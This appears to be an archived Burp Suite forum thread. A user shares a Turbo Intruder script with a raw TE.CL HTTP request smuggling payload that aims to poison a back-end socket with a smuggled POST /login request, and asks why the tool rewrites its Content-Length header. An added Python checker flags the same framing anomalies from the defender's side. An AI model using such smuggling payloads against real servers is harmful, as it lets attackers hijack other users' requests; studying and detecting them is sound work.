The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.


Turbo Intruder: always updating Content-Length header

Nan | Last updated: Mar 19, 2020 12:42AM UTC

Hello, I have been trying to launch an HTTP Desync attack using Turbo Intruder. Here is my script:

    def queueRequests(target, wordlists):
        engine = RequestEngine(endpoint=target.endpoint,
                               concurrentConnections=5,
                               requestsPerConnection=1,
                               timeout=10,
                               pipeline=True,
                               maxRetriesPerRequest=0,
                               engine=Engine.THREADED,
                               )
        engine.start()

        attack = '''POST / HTTP/1.1
    Host: example.com
    Content-Length: 4
    Transfer-Encoding : chunked

    46
    POST /login HTTP/1.1
    Host: example.com
    Content-Length: 15

    kk
    0

    '''
        engine.queue(attack)

.......

I am targeting an endpoint which I believe has the TE.CL vulnerability. For the above script (attack) to work, it's imperative that the 'Content-Length: 4' in the 'attack' request remains unchanged so that I can poison the vulnerable endpoint's receiving socket (with the request: 'POST /login HTTP/1.1....').

However, during my testing, I've noticed the 'Content-Length: 4' was always updated to 'Content-Length: 76', where 76 is the exact length of the message body of my 'attack' request, thus causing the failure of my Desync attack.

Any suggestions on how to avoid updating the 'Content-Length' header in this case? Did I not properly configure the Turbo Intruder?
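Seen from the receiving side, the request in the post above carries three framing anomalies that a front-end proxy or WAF can reject on sight. The check below is an added example, not part of the original post: the function names are hypothetical, and the sample bytes are constructed from the request quoted in the post, assuming CRLF line endings.

```python
# Added example: names are hypothetical, sample requests are constructed.

def parse_raw_request(raw: bytes):
    """Split one raw HTTP/1.1 request into (request line, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name, value.strip()))  # keep the name untrimmed on purpose
    return lines[0], headers, body


def framing_findings(raw: bytes):
    """Return the reasons a front end should refuse to forward this request."""
    _, headers, body = parse_raw_request(raw)
    findings = []
    # RFC 7230 section 3.2.4: whitespace between field name and colon is invalid.
    for name, _ in headers:
        if name != name.strip():
            findings.append("whitespace-before-colon:" + name.strip().decode().lower())
    norm = [(n.strip().lower(), v) for n, v in headers]
    cl = [v for n, v in norm if n == b"content-length"]
    te = [v for n, v in norm if n == b"transfer-encoding"]
    if cl and te:  # two competing ways to find the end of the body
        findings.append("content-length-with-transfer-encoding")
    if len(set(cl)) > 1:
        findings.append("conflicting-content-length")
    for v in cl:
        if not v.isdigit():
            findings.append("invalid-content-length")
        elif int(v) != len(body):
            findings.append("content-length-mismatch:%d!=%d" % (int(v), len(body)))
    return findings


# Constructed from the request quoted in the post (body is 76 bytes).
SAMPLE = (b"POST / HTTP/1.1\r\nHost: example.com\r\nContent-Length: 4\r\n"
          b"Transfer-Encoding : chunked\r\n\r\n"
          b"46\r\nPOST /login HTTP/1.1\r\nHost: example.com\r\n"
          b"Content-Length: 15\r\n\r\nkk\r\n0\r\n\r\n")
# Constructed well-formed request for comparison.
CLEAN = b"POST /login HTTP/1.1\r\nHost: example.com\r\nContent-Length: 2\r\n\r\nkk"

if __name__ == "__main__":
    print(framing_findings(SAMPLE))
    print(framing_findings(CLEAN))
```

The mismatch check assumes the buffer holds exactly one message; on a pipelined connection, frame by the declared length first and apply the other two checks per message.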

Liam, PortSwigger Agent | Last updated: Mar 20, 2020 10:17AM UTC